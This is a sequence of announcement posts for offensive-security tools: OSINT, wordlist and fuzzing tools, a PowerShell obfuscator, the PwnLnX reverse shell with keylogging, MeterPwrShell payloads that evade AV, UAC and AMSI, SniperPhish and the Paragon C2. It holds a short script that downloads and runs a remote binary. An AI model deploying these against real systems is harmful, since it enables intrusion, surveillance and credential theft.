  • Issue 5: Removed the hardcoded MFT size. MFT size determined by the Boot Sector
  • Issue 6: Converted the TScopy class into a singleton. This allows the class to be instantiated once and reuse the current MFT metadata object for all copies.
  • Issue 7: Attribute type ATTRIBUTE_LIST is now being handled.
  • Issue 9: Attrubute type ATTRIBUTE_LIST was not handled for files. THis caused a silent failure for files like SOFTWARE regestry hive.
  • Changes: General comments have been added to the code
  • Changes: Input parameters have changed. Reduced the three(3) different options --file, --list, and --directory to --file.
  • Changes: Backend restructuring to support new features.

TODO:
  1. Add support for Alternate Data Streams (ADS)
  2. Verify support for non-ascii path characters


Profil3r - OSINT Tool That Allows You To Find A Person'S Accounts And Emails + Breached Emails

$
0
0


Profil3r is an OSINT tool that allows you to find potential profiles of a person on social networks, as well as their email addresses. This program also alerts you to the presence of a data leak for the found emails.


Prerequisite

Python 3


Installation
git clone https://github.com/Rog3rSm1th/Profil3r.git
cd Profil3r/
python3 setup.py install

Features

Emails
  • Data leaks
  • Emails

Social
  • Instagram
  • Facebook
  • Twitter
  • Tiktok
  • Pinterest

Music
  • Soundcloud
  • Spotify

Programming
  • Github
  • Pastebin

Forum
  • 0x00sec.org
  • Jeuxvideo.com

Tchat
  • Skype

Entertainment
  • Dailymotion

Report

A report in JSON format is automatically generated in the reports folder


The config.json file

You can modify the report path and the services Profil3r will search in the config.json file

FieldTypeDefaultDescription
report_elementsArray["email", "facebook", "twitter"]List of the services for which profil3r will search
report_pathString"./reports/{}.json"The path of the report's JSON file, this path must include a {} which corresponds to the file name

Example
python3 profil3r.py john doe

License

This project is under the MIT license.

Contact

for any remark, suggestion or job offer, you can contact me at r0g3r5@protonmail.com or on twitter@Rog3rSm1th



Cook - A Customizable Wordlist And Password Generator

$
0
0


Easily create permutations and combinations of words with predefined sets of extensions, words and patterns/function. You can use this tool to easily create complex endpoints and passwords. Customizing tool according to your unique secrets keywords.
Easy UX, Checkout Usage


Installation

Using Go
  go get github.com/giteshnxtlvl/cook

OR

  GO111MODULE=on go get github.com/giteshnxtlvl/cook

Update
  go get -u github.com/giteshnxtlvl/cook

Download latest builds

https://github.com/giteshnxtlvl/cook/releases/


Customizing tool

By customizing you will able to make and use your own lists and patterns/functions.

  1. Create empty file named cook.yamlor Download cook.yaml
  2. Create an environment variable COOK =Path of fileHow to setup up env variable?
  3. Done, Run cook -config

Basic Permutation


 

Recipe

  cook -start admin,root  -sep _,-  -end secret,critical  start:sep:end
  cook admin,root:_,-:secret,critical

Advance Permutation

Understanding concept is important!



Predefined Sets



Recipe

 cook -start admin,root  -sep _ -end secret  start:sep:archive
 cook admin,root:_:archive

Create your own unique sets



Use it like CRUNCH



Patterns/Functions


 

Recipe

  cook -name elliot -birth date(17,Sep,1994) name:birth

Int Ranges



Files

Regex Input from File



Recipe

 cook -exp raft-large-extensions.txt:\.asp.*  /:admin:exp

Save Wordlists by Unique Names



File not found

If file mentioned in param not found, then there will be no errors, instead it will do this

 cook -file file_not_exists.txt admin,root:_:file
  admin_file_not_exists.txt
root_file_not_exists.txt

Cases



Using COOK with other tools

Direct fuzzing with GoBuster
 cook admin,root:_:archive | gobuster dir -u https://example.com/ -w -

Useful Resources
ListDescription
raft-large-extensions.txtList of all extensions
all_tlds.txtList of all tlds

Todo
  • Endpoints Analyser
  • Interactive mode for configuring cook.yaml

All Sets
# Character set like crunch
charSet:
sep : [_- ] #common separators
n : [0123456789]
A : [ABCDEFGHIJKLMNOPQRSTUVWXYZ]
a : [abcdefghijklmnopqrstuvwxyz]
aAn : [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
An : [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
an : [abcdefghijklmnopqrstuvwxyz0123456789]
aA : [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ]
s : ["!#$%&'()*+,-./:;<=>?@[\\]^_`{|}~&\""]
all : ["!#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\""]

# File to access from anywhere
files:
raft_ext : [E:\tools\wordlists\SecLists\Discovery\Web-Content\raft-large-extensions.txt]
raft_dir : [E:\tools\wordlists\SecLists\Discovery\Web-Content\raft-large-directories.txt]
raft_files : [E:\tools\wordlists\SecLists\Discovery\Web-Co ntent\raft-large-files.txt]
robot_1000 : [E:\tools\wordlists\SecLists\Discovery\Web-Content\RobotsDisallowed-Top1000.txt]

# Create your lists
lists:
schemas : [aim, callto, cvs, data, facetime, feed, file, ftp, git, gopher, gtalk, h323, hdl, http, https, imap, irc, irc6, ircs, itms, javascript, magnet, mailto, mms, msnim, news, nntp, prospero, rsync, rtsp, rtspu, sftp, shttp, sip, sips, skype, smb, snews, ssh, svn, svn, svn+ssh, telnet, tel, wais, ymsg]
bypass : ["%00", "%09", "%0A", "%0D", "%0D%0A"]

admin_set : [admin, root, su, superuser, administration]
api : [/v1/,/v2/,/v3/,/v4/,/v5/,/api/]
pass_ends : [123, "@123", "#123"]

months : [January, February, March, April, May, June, July, August, September, October, November, December]
mons : [Jan, Feb, Mar, Apr, May, Jun, Jul, Aug, Sep, Oct, Nov, Dec]

# Patterns
patterns:
date :
- date(D,M,Y)
- DMY
- MDY
- D/M/Y
- M/D/Y
- D-M-Y
- M-D-Y
- D.M.Y
- M.D.Y
- D.Y
- M.Y
- D.M


# Extension Set, . will added before using this
extensions:
config : [conf, confq, config]
data : [xml, json, yaml, yml]
backup : [bak, backup, backup1, backup2]
exec : [exe, msi, bin, command, sh, bat, crx]
web : [html, html5, htm, js, jsx, jsp, wasm, php, php3, php5, php7]
iis : [asax, ascx, asmx, aspx, exe, aspx.cs, ashx, axd, config, htm, jar, js, rdl, swf, txt, xls, xml, xsl, zpd, suo, sln]
archive : [7z, a, apk, xapk, ar, bz2, cab, cpio, deb, dmg, egg, gz, iso, jar, lha, mar, pea, rar, rpm, s7z, shar, tar, tbz2, tgz, tlz, war, whl, xpi, zip, zipx, xz, pak, tar.gz, gz]
code : [c, cc, class, clj, cpp, cs, cxx, el, go, h, java, lua, m, m4, php, php3, php5, php7, pl, po, py, rb, rs, sh, swift, vb, vcxproj, xcodeproj, xml, diff, patch, js, jsx]

#Rest
css_type: [css, less, scss]
sheet : [ods, xls, xlsx, csv, ics vcf]
slide : [ppt, pptx, odp]
font : [eot, otf, ttf, woff, woff2]
text : [doc, docx, ebook, log, md, msg, odt, org, pages, pdf, rtf, rst, tex, txt, wpd, wps]
audio : [aac, aiff, ape, au, flac, gsm, it, m3u, m4a, mid, mod, mp3, mpa, pls, ra, s3m, sid, wav, wma, xm]
book : [mobi, epub, azw1, azw3, azw4, azw6, azw, cbr, cbz]
video : [3g2, 3gp, aaf, asf, avchd, avi, drc, flv, m2v, m4p, m4v, mkv, mng, mov, mp2, mp4, mpe, mpeg, mpg, mpv, mxf, nsv, ogg, ogv, ogm, qt, rm, rmvb, roq, srt, svi, vob, webm, wmv, yuv]
image : [3dm, 3ds, max, bmp, dds, gif, jpg, jpeg, png, psd, xcf, tga, thm, tif, tiff, yuv, ai, eps, ps, svg, dwg, dxf, gpx, kml, kmz, webp]



Ldsview - Offline search tool for LDAP directory dumps in LDIF format

$
0
0


Offline search tool for LDAP directory dumps in LDIF format.


Features
  • Fast and memory efficient parsing of LDIF files
  • Build ldapsearch commands to extract an LDIF from a directory
  • Show directory structure
  • UAC and directory time format translation

Config

Config options can be passed as CLI flags, environment variables, or via a config file courtsey of viper. Reference the project's documentation for all of the different ways you can supply configuration.

  • By default, ldsview will look for a file called .ldsview.{json,toml,yaml} in the user's home directory
  • Environment variables with a prefix of LDSVIEW will be read in by the application

Usage

Detailed usage information is available via the --help flag or the help command for ldsview and all subcommands.


Search Syntax

ldsview's search mechanism is based on the entityfilter project. Detailed information about search filter syntax can be found in that project's README.


Examples
  • Build ldapsearch command to extract LDIF files from a directory: ldsview cmdbuilder
    • The command will prompt you for any information needed
    • Have the following ready:
      • Directory host FQDN or IP
      • Domain DN
      • User to run as
      • User's password
  • Quickly find a specific entity in an LDIF file: ldsview -f myfile.ldif entity myuser
  • Parse UAC flag from AD: ldsview uac 532480
  • Search LDIF file: ldsview -f myfile.ldif search "adminCount:=1,sAMAccountName:!=krbtgt"
    • This command will return all entities with an adminCount of 1 that are not krbtgt
    • -i can be used to limit which attributes are returned from matching entities
    • --tdc will translate directory timestamps into a human readable format

Tools Directory

Additional tools and utilities for managing LDIFs:

Makefile: Place the Makefile in the same directory as your exported LDIF and run make.

>> make -j9 LDIF=./my.domain.ldif

This will split and create the following default LDIFs:

  • users.ldif
  • computers.ldif
  • groups.ldif
  • domain_admin.ldif
  • poss_svc_accnts.ldif
  • pass_not_reqd.ldif
  • pass_cant_change.ldif
  • users_dont_expire.ldif
  • trusted_4_delegation.ldif
  • preauth_not_reqd.ldif
  • password_expired.ldif
  • trust2auth4delegation.ldif


Fav-Up - IP Lookup By Favicon Using Shodan

$
0
0


Lookups for real IP starting from the favicon icon and using Shodan.




Installation
  • pip3 install -r requirements.txt
  • Shodan API key (not the free one)

Usage

CLI

First define how you pass the API key:

  • -k or --key to pass the key to the stdin
  • -kf or --key-file to pass the filename which get the key from
  • -sc or --shodan-cli to get the key from Shodan CLI (if you initialized it)

As of now, this tool can be used in three different ways:

  • -ff or --favicon-file: you store locally a favicon icon which you want to lookup
  • -fu or --favicon-url: you don't store locally the favicon icon, but you know the exact url where it resides
  • -w or --web: you don't know the URL of the favicon icon, but you still know that's there
  • -fh or --favicon-hash: you know the hash and want to search the entire internet.

You can specify input files which may contain urls to domain, to favicon icons, or simply locations of locally stored icons:

  • -fl, --favicon-list: the file contains the full path of all the icons which you want to lookup
  • -ul, --url-list: the file contains the full URL of all the icons which you want to lookup
  • -wl, --web-list: the contains all the domains which you want to lookup

You can also save the results to a CSV/JSON file:

  • -o, --output: specify the output and the format, e.g.: results.csv will save to a CSV file (the type is automatically recognized by the extension of the output file)

Examples

Favicon-file

python3 favUp.py --favicon-file favicon.ico -sc


Favicon-url

python3 favUp.py --favicon-url https://domain.behind.cloudflare/assets/favicon.ico -sc


Web

python3 favUp.py --web domain.behind.cloudflare -sc


Module
from favUp import FavUp

f = FavUp()
f.shodanCLI = True
f.web = "domain.behind.cloudflare"
f.show = True
f.run()

for result in f.faviconsList:
print(f"Real-IP: {result['found_ips']}")
print(f"Hash: {result['favhash']}")

All attributes
VariableType
FavUp.showbool
FavUp.keystr
FavUp.keyFilestr
FavUp.shodanCLIbool
FavUp.faviconFilestr
FavUp.faviconURLstr
FavUp.webstr
FavUp.shodanShodan class
FavUp.faviconsListlist[dict]

FavUp.faviconsList stores all the results, the key fields depend by the type of the lookup you want to do.

In case of --favicon-file or --favicon-list:

  • favhash stores the hash of the favicon icon
  • file stores the path

In case of --favicon-url or --url-list:

  • favhash stores the hash of the favicon icon
  • url stores the URL of the favicon icon
  • domain stores the domain name
  • maskIP stores the "fake" IP (e.g. the Cloudflare one)
  • maskISP store the ISP name associated to the maskIP

In case of --web or --web-list:

  • favhash stores the hash of the favicon icon
  • domain stores the domain name
  • maskIP stores the "fake" IP (e.g. the Cloudflare one)
  • maskISP store the ISP name associated to the maskIP

(in this case the URL of the favicon icon is returned by the href attribute of <link rel='icon'> HTML element)

If, while searching for the favicon icon, nothing useful is found, not-found will be returned.

In all three cases, found_ips field is added for every checked entry. If no IP(s) have been found, not-found will be returned.


Compatibility

At least python3.6 is required due to spicy syntax.


Feedback/Suggestion

Feel free to open any issue, your feedback and suggestions are always welcome <3


Publications

Unveiling IPs behind Cloudflare by @noneprivacy


Disclaimer

This tool is for educational purposes only. The authors and contributors don't take any responsibility for the misuse of this tool. Use It At Your Own Risk!


Credits

Conceived by Francesco Poldi noneprivacy, build with Aan Wahyu Petruknisme

stanley_HAL told me how Shodan calculates the favicon hash.

What is Murmur3?

More about Murmur3 and Shodan



Invoke-Stealth - Simple And Powerful PowerShell Script Obfuscator

$
0
0


Invoke-Stealth is a Simple & Powerful PowerShell Script Obfuscator.

This tool helps you to automate the obfuscation process of any script written in PowerShell with different techniques. You can use any of them separately, together or all of them sequentially with ease, from Windows or Linux.


Requirements
  • Powershell 4.0 or higher
  • Bash*
  • Python 3*

*Required to use all features


Download

It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone https://github.com/JoelGMSec/Invoke-Stealth.git

You can also download the limited version as follows:

powershell iwr -useb https://darkbyte.net/invoke-stealth.php -outfile Invoke-Stealth.ps1

Usage
.\Invoke-Stealth.ps1 -help

Info: This tool helps you to automate the obfuscation process of
any script written in PowerShell with different techniques

Usage: .\Invoke-Stealth.ps1 script.ps1 -technique Xencrypt
- You can use as single or separated by commas -

Techniques:
· Chimera: Substitute strings and concatenate variables
· Xencrypt: Compresses and encrypts with random iterations
· PyFuscation: Obfuscate functions, variables and parameters
· PSObfuscation: Convert content to bytes and encode with Gzip
· ReverseB64: Encode with base64 and reverse it to avoid detections
· All: Sequentially executes all techniques described above

Warning: The output script will exponentially multiply the original size
Chimera& PyFuscation need dependencies to work properly in Windows

The detailed guide of use can be found at the following link:

https://darkbyte.net/ofuscando-scripts-de-powershell-con-invoke-stealth


License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.


Credits and Acknowledgments

This script has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec

Some modules use third-party code, scripts, and tools, particularly:

Chimera by tokyoneon --> https://github.com/tokyoneon/Chimera

BetterXencrypt by GetRektBoy724 --> https://github.com/GetRektBoy724/BetterXencrypt

PyFuscation by CBHue --> https://github.com/CBHue/PyFuscation

PSObfuscation by gh0x0st --> https://github.com/gh0x0st/Invoke-PSObfuscation


Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can contact through info@darkbyte.net


PwnLnX - An Advanced Multi-Threaded, Multi-Client Python Reverse Shell For Hacking Linux Systems

$
0
0


An advanced multi-threaded, multi-client python reverse shell for hacking linux systems. There's still more work to do so feel free to help out with the development. Disclaimer: This reverse shell should only be used in the lawful, remote administration of authorized systems. Accessing a computer network without authorization or permission is illegal.


Getting Started

Please follow these instructions to get a copy of PwnLnX running on your local machine without any problems.


Prerequisites
  • Python3:
    • vidstream
    • pyfiglet
    • tqdm
    • mss
    • termcolor
    • pyautogui
    • pyinstaller
    • pip3
    • pynput

Installing
# Download source code
git clone https://github.com/spectertraww/PwnLnX.git


cd PwnLnX

# download and install the dipendences
chmod +x setup.sh

./setup.sh

Getting PwnLnx up and running

Show help

python3 PwnLnX.py --help


Listening for incoming connections

python3 PwnLnX.py --lhost [your localhost ip address] --lport [free port for listening incoming connections]


creating/Generating a payload
chmod +x PwnGen.sh

./PwnGen.sh

then follow the procedure to successifully create your payload, the payload is saved in PwnLnx directory. Send the created payload to victim


PwnLnx Usage
CommandUsage
helpshow help
exitclose all the sessions and quit the progaram.
show sessionsshow all available sessions from connected.
session [ID]interact with a specified session ID.
kill [all/ID]kill a specified session or all to kill all sessions.
bannerhave funny by changing the program banner

Interact with a session
CommandUsage
helpshow help.
quitclose the current session.
backgroundbackground the current session.
sysinfoget minimum target system information.
create_persistcreate a persistant backdoor.
uploadupload the specified filename to the target system.
downloaddownload the specified filename from the target system.
screenshottake a desktopscreenshot of the target system.
start_screensharestart desktop screensharing.
stop_screensharestop desktop screensharing.
start_keycapstart capturing victim's pressed keystrokes.
dump_keycapdump/get the captured keystrokes.
stop_keycapstop the capturing keystrokes.

NB. you can also execute linux system commands besides those listed above.


Disclaimer

I will not be responsible for any direct or indirect damage caused due to the usage of this tool, it is for educational purposes only.


Report Bugs

spectertraww@gmail.com


Snapshots












M365_Groups_Enum - Enumerate Microsoft 365 Groups In A Tenant With Their Metadata

$
0
0


The all_groups.py script allows to enumerate all Microsoft 365 Groups in a Azure AD tenant with their metadata:

  • name
  • visibility: public or private
  • description
  • email address
  • owners
  • members
  • Teams enabled?
  • SharePoint URL (e.g. for Teams shared files)

All of this, even for private Groups! Read more about this on my blog article "Risks of Microsoft Teams and Microsoft 365 Groups"

The reporting.py script will take the JSON output from all_groups.py and generates a CSV files allowing to quickly identify sensitive private or public groups.


Installation

Requirement:

  1. Download the repository
  2. Install requirements with
pip install -r requirements.txt

Usage

You will need a valid account on the tenant. Different authentication methods are supported:

  • via login + password (MFA not supported)
python all_groups.py -u myuser@example.onmicrosoft.com -p MyPassw0rd
  • via device authentication, which supports MFA via the browser. Launch then follow instructions
python all_groups.py --device-code

Other methods are also offered. You can read the ROADTools documentation or run the script without any argument to get help.

python all_groups.py

That's all, you don't need more options! The script output will be in all_groups.json in the current directory.

Then, if you want a nicer and more concise output from this JSON, use reporting.py to transform it:

python reporting.py

It automatically takes all_groups.json in the current directory, and outputs to all_groups.csv in the same directory.


Acknowledgements

This project uses for authentication the very helpful roadlib from ROADTools by @dirkjanm



MeterPwrShell - Automated Tool That Generate The Perfect Powershell Payload

$
0
0


Automated Tool That Generate A Powershell Oneliner That Can Create Meterpreter Shell On Metasploit,Bypass AMSI,Bypass Firewall,Bypass UAC,And Bypass Any AVs.

This tool is powered by Metasploit-Framework and amsi.fail


Notes
  • NEVER UPLOAD THE PAYLOAD THAT GENERATED BY THIS PROGRAM TO ANY ONLINE SCANNER
  • NEVER USE THIS PROGRAM FOR MALICIOUS PURPOSE
  • SPREADING THE PAYLOAD THAT GENERATED BY THIS PROGRAM IS NOT COOL
  • ANY DAMAGE GENERATED BY THIS PROGRAM IS NOT MY (As the program maker) RESPONSIBILTY!!!
  • If you have some feature recommendation,post that on Issue
  • If you have some issue with the program,try redownloading it again (trust me),cause sometimes i edit the release and fix it without telling
  • If you want to know how tf my payload bypass any AVs,you can check on this and this
  • Dont even try to fork this repository,you'll dont get the releases!

Features (v1.5.1)
  • Bypass UAC
  • Automatic Migrate (using PrependMigrate)
  • Built-in GetSYSTEM (if u use the Bypass UAC option)
  • Disable All Firewall Profile (if u use the Bypass UAC option)
  • Fully Bypass Windows Defender Real-time Protection (if you choose shortened payload or using Bypass UAC or both)
  • Disable Windows Defender Security Features (if u use the Bypass UAC option)
  • Fully unkillable payload
  • Bypasses AMSI Successfully (if you choose shortened payload)
  • Short One-Liner (if you choose shortened payload)
  • Bypass Firewall (If you pick an unstaged payload)
  • Great CLI
  • A Lot More (Try it by yourself)

All payload features is tested on Windows 10 v20H2

Advantages Of MeterPwrShell Compared To The web_delivery Module From Metasploit Framework
  • Shorter stager (Or short one-liner in this case)
  • Various AMSI bypass technique and code
  • Dont need to setup a server for the stager
  • Support Ngrok built-in (so the victim doesnt need to be on the same local network)
  • Automatic Built-in Privesc
  • Easily Bypass Windows Defender

Thanks to
  • Every single of my Discord Friends
  • Special Thx to theia#8536 on Discord
  • @FuzzySec for that awesome Masquerade PEB script
  • @decoder-it for that amazing PPID Spoofing script
  • Me for not dying when creating this tool
  • Ed Wilson AKA Microsoft Scripting Guy for the great Powershell scripting tutorials
  • and the last one is Emeric Nasi for the research on bypassing AV dynamics

Requirements
  • Kali Linux,Ubuntu,Or Debian (If you dont use on of those,the tool will not work!!!)
  • Metasploit Framework
  • Internet Connection (Both On Victim And Attacker Computer)

Installation
apt update && apt install wget
mkdir MeterPwrShell
cd MeterPwrShell && wget https://github.com/GetRektBoy724/MeterPwrShell/releases/download/v1.5.1/meterpwrshellexec
chmod +x meterpwrshellexec

Usage
# ./meterpwrshellexec -c help
Available arguments : help, version, showbanner, showlastdebuglog, disablerootdetector, disableinternetdetector, disablealldetector
help : Show this page
version : Show MeterPwrShell's version
showbanner : Show MeterPwrShell's Banner
showlastdebuglog : Well,Its kinda self-explanatory tho
disablerootdetector : Well,Its kinda self-explanatory tho
disableinternetdetector : Well,Its kinda self-explanatory tho
disablealldetector : Disable all detector except Linux distribution detector

You also can use MeterPwrShell Without Any Flags And Arguments


Attack Vectors
  • BadUSBs
  • Malicious Shortcuts (lnk2pwn)
  • Document Macro Payload
  • MS DDE Exploit
  • Extreme Way : Type it in by yourself
  • Any exploit/vulns that let you execute command to victim
  • Idk i have run out of idea lmao

To-do List

Available features options
  • Bypass AMSI
  • Shortened Payload AKA IEX WebClient method (If you use Bypass AMSI Feature)
  • Bypass UAC (If you use Shortened Payload AKA IEX WebClient method)


SniperPhish - The Web-Email Spear Phishing Toolkit

$
0
0


SniperPhish is a phishing toolkit for pentester or security professionals to enhance user awareness by simulating real-world phishing attacks. SniperPhish helps to combine both phishing emails and phishing websites you created to centrally track user actions. The tool is designed in a view of performing professional phishing exercise and would be reminded to take prior permission from the targeted organization to avoid legal implications.


Installation
  1. Download the source code and put it in your web root folder
  2. Open http://localhost/install in your browser and follow the steps for installation
  3. After installation, open http://localhost/spear to login

Default login - Username: admin Password: sniperphish


Main Features
  • Web tracker code generation - track your website visits and form submissions independently
  • Create and schedule Phishing mail campaigns
  • Combine your phishing site with email campaign for centrally tracking
  • An independent "Simple Tracker" module for quick tracking an email or web page visit
  • Advance report generation - generate reports based on the tracking data you needed
  • Custom tracker images and dynamicQR codes in messages
  • Track phishing message replies

Screenshots




Creating Web-Email Campaign

We create web tracker -> Add the web tracker to the phishing website -> create mail campaign with a link pointing to the phishing website -> start mail campaign.


Creating a web tracker:
  1. Design your website in your favorite programming language. Make sure you provided unique "id" and "name" value for HTML fields such as text field, checkbox etc.
  2. Generate web-tracker code Web Tracker -> New Tracker. The "Web Pages" tab list the pages you want to track
    • To track form submission data, provide the "id" or "name" values of HTML fields present in your phishing site form.
    • Repeat above for each page in your phishing site.
  3. From the final output, copy the generated JavaScript link and add it under the section of each website page.
  4. Finally, save the tracker created. Now the tracker is activated and listening in the background. Opening your phishing site or data submission is tracked.

Creating an Email campaign:
  1. Go to Email Campaign -> User Group and add target users
  2. Go to Email Campaign -> Sender List and configure Mail server details
  3. Go to Email Campaign -> Email Template and create mail template. When you add your phishing website link, make sure to append ?cid={{CID}} at the end. This is to distinguish each users. For example, http://yourphishingsite.com/login?cid={{CID}}
  4. Now go to Email Campaign -> Campaign List -> New Mail Campaign and select/fill the fields to create campaign.
  5. Start Mail campaign

Viewing combined Web-Email Result

Open Web-MailCamp Dashboard -> Select Campaign and select Mail Campaign and Web Tracker you created.



More

SniperPhish honors contributions of

Joseph Nygil (@j_nygil) and Sreehari Haridas (@sr33h4ri)



Vaf - Very Advanced (Web) Fuzzer

$
0
0


very advanced fuzzer


compiling
  1. Install nim from nim-lang.org
  2. Run
nimble build

A vaf.exe file will be created in your directory ready to be used


using vaf

using vaf is simple, here's the current help text:

Usage:
vaf - very advanced fuzzer [options]

Options:
-h, --help
-u, --url=URL choose url, replace area to fuzz with []
-w, --wordlist=WORDLIST choose the wordlist to use
-sc, --status=STATUS set on which status to print, set this param to 'any' to print on any status (default: 200)
-pr, --prefix=PREFIX prefix, e.g. set this to / for content discovery if your url doesnt have a / at the end (default: )
-sf, --suffix=SUFFIX suffix, e.g. use this for extensions if you are doing content discovery (default: )
-pd, --postdata=POSTDATA only used if '-m post' is set (default: {})
-m, --method=METHOD suffix, e.g. use this for extensions if you are doing content discovery (default: get)
-pif, --printifreflexive print only if the output reflected in the page, useful for finding xss
-ue, --urlencode url encode the payloads
-pu, --printurl prints the url that has been requested

screenshots



(with every status code printed, suffixes .php,.html and no prefixes)



(with url printed, every status code printed, suffixes .php,.html and no prefixes)



(post data fuzzing)


examples

Fuzz post data:

vaf.exe -w example_wordlists\short.txt -u https://jsonplaceholder.typicode.com/posts -m post -sc 201 -pd "{\"title\": \"[]\"}"

Fuzz GET URLs

vaf.exe -w example_wordlists\short.txt -u https://example.org/[] -sf .html

tips
  • Add a trailing , in the suffixes or prefixes argument to try the word without any suffix/prefix like this: -pf .php, or -sf .php,
  • Use -pif with a bunch of xss payloads as the wordlist to find XSS
  • Make an issue if you want to suggest a feature


Paragon - Red Team Engagement Platform With The Goal Of Unifying Offensive Tools Behind A Simple UI

$
0
0

Paragon is a Red Team engagement platform. It aims to unify offensive tools behind a simple UI, abstracting much of the backend work to enable operators to focus on writing implants and spend less time worrying about databases and css. The repository also provides some offensive tools already integrated with Paragon that can be used during engagements.

This repository is still under heavy development and is not ready for production use. When it is considered stable, a V1.0.0 tag will be released. Until then, the API may encounter breaking changes as we continually simplify our design. Please read the developer documentation below if you'd like to help us reach this milestone faster.


Feature Highlights
  • Easily integrate custom tools to unify operations behind a single interface
  • Query the Red Team knowledge graph using a provided GraphQL API
  • Event emission for low latency automation and real time processing
  • Python-like scripting language for deployments, post-exploitation, and more
  • Cross-platform implants & deployment included
  • Record operator activity to conviniently aggregate into a post-engagement report for review

Getting Started

A quick demonstration instance can be setup by cloning the repository and running docker-compose up. Open 127.0.0.1:80 in your browser to get started!

The utilized images are available on docker-hub, and can be configured from a docker-compose file for a production deployment.


Component Overview

Scripting Language

Most components in this repository rely on a Python-like scripting language which enables powerful control and customization of their behaviour. The language is a modified version of Google's starlark, extended with cross-platform functionality for operators. This also enables tools like the agent and dropper (discussed below) to execute tasks without relying on system binaries (curl, bash, etc). All operations are executed as code in Golang, so it's intuitive to add additional functionality to the scripting environment. Here is an example script:

# Download a file via https, execute it, and don't keep it as a child process.
load("sys", "request")

new_bin = "/tmp/kqwncWECaaV"
request("https://library.redteam.tld", writeToFile=new_bin)

# set new_bin permissions to 0755
chmod(new_bin, ownerRead=True, ownerWrite=True, ownerExec=True, groupRead=True, groupExec=True, worldRead=True, worldExec=True)
exec(new_bin, disown=True)

Reference


Teamserver

Provides a simple web application and GraphQL API to interface with a Red Team knowledge graph, unifying tools behind a centralized source of truth and abstracting many tedious backend concerns from operators. Integrate your custom tools with the Teamserver (using the GraphQL API or event subscriptions) to save time on the backend work. The Teamserver records all activity, so with all of your tools unified in one place, writing post-engagement reports becomes signficantly easier.


Built-In Tools

The below tools are also included within the repository. They can easily be extended to fit many cross-platform use cases.


Dropper
  • Fully cross-platform
  • Statically compile assets into a single binary
  • Provides Python-like scripting language for custom deployment configuration

Paragon provides a tool for packaging assets (binaries, scripts, etc.) into a single binary that when executed will execute your custom deployment script that may write assets to the filesystem, launch processes, download files, handle errors, and more. It is fully cross-platform and statically compiled, providing reliable deployments. If you wish to extend it's functionality, you may simply extend the generated golang file before compiling.


Agent
  • Fully cross-platform
  • Provides Python-like scripting language for post exploitation
  • Modular communication mechanisms, only compile in what you need
    • Utilize multiple options to ensure reliable callbacks
  • Customize how the agent handles communication failures

An implant that executes tasks and reports execution results. It is configured by default to execute tasks using Paragon's Python-like scripting language and to communicate with a C2 via http(s). It is written in Go, and can be quickly modified to add new transport methods (i.e. DNS), execution options, fail over logic, and more.


C2
  • Lightweight deployment
  • Highly performant, able to handle thousands of Agents
    • Dependent on system resources and available bandwidth
  • Distributed service, utilize as many C2s as you'd like

Acts as a middleman between the Agent and the Teamserver. It handles agent callbacks for a variety of communication mechanisms, and provides it with new tasks from the teamserver queue.


Runner
  • Low latency, real time task execution
  • Easily extended to add support for more communication mechanisms
  • Distributed service, utilize as many runners as you'd like

Instead of waiting for a callback, some situations might require a foward connection to quickly execute a task and view it's output. The runner accomplishes this by subscribing to task queues and establishing a connection to the target machine (i.e. using ssh). This enables shell-like integrations to utilize the same interface as implants and C2s. It also allows for initial implant deployment to be conducted through this interface.


Scanner
  • Monitor reachable target services
  • Automate responses when services become (un)available
  • Provide network information to the knowledge graph, which may be utilized by other tools
  • Distributed service, utilize as many scanners as you'd like

Monitor target network activity and visible services. Map out a graph of the engagement network, and trigger automation on state changes (i.e. ssh becomes available).


FAQ

What if machines report the same UUID?

Setting the PG_KS_MachineUUID killswitch environment variable for the teamserver will disable lookups that utilize machine UUIDs.


Terminology

To ensure clear communication about these complex systems, we have outlined a few project-specific terms below that will be used throughout the project's documentation.


Implant

Any malicious software that will be run on compromised systems during the engagement.


Task

Desired operations to be executed on a specific compromised system. Tasks provide execution instructions to implants, however their syntax / structure can be completely specific to a tool.


Agent

An Implant that receives tasks from the teamserver, executes them, and reports their results. An extensible default implementation is included with this repository, which requires that tasks be provided as scripts written using the project's Python-like DSL.


Job

Requests that the Teamserver perform a set of given operations. Upon creating a job, the instructions will be saved but not executed. The user may request that the Teamserver execute a job zero or more times by queuing the job and providing the required parameters to it. Jobs may never be updated, but new versions of jobs can be created to avoid excessive copy-paste.

A common use-case for a Job is when the user wishes to execute a script on a few Targets. The user creates a job, which instructs the teamserver to create tasks with the provided content, but leaves the desired target machines as a parameter. When the job is queued, the user provides a list of target machines as a parameter, and the Teamserver will create a task for each machine.


Developer Guide

Below serves as an initial and brief reference for Paragon development. More documentation can be found in the package godocs or by reading through some code :) After we have finalized some design decisions (well before reaching v1), a code-freeze will take effect until all documentation has been updated and appropriately organized.


Prerequisites
  • Git
  • Docker
  • VSCode
    • While you may use other editors, you'll lose out on the customization that speeds up development for VSCode
    • The Remote - Containers extension provided by Microsoft is required to get started.

Environment Setup

After installing the prerequisites listed above, you'll be able to get started in no time. Simply clone the repository and open it in VSCode. You will be prompted to open the codebase in a development container, which has been configured with all the project dependencies and developer tools you'll need. If this option does not appear for you, open the command pallete and run > Remote-Containers: Open Folder In Container which should start the container for you. If this is your first time launching the container, it may take a while to download... so get yourself some coffee ^_^


Project Layout

Below is an overview of the project structure and where each component lives. If this becomes outdated, please feel free to submit an issue reporting this or preferably a PR to fix it. The codebase is setup as a monorepository, which enables us to take advantage of shared development tooling, standardization, etc. while avoiding complicated version conflicts.

FolderUse Case
.devcontainerConfiguration for the VSCode container development environment.
.githubGithub configuration.
.statsA git ignored directory (which you may or may not have) for storing performance profiling output.
entGraph related API definitions used by the teamserver.
graphqlGraphQL schema & related code generated from ent.
cmdCommand line executable tools and services.
distA git ignored directory for storing build artifacts.
dockerDockerfiles used for example deployment.
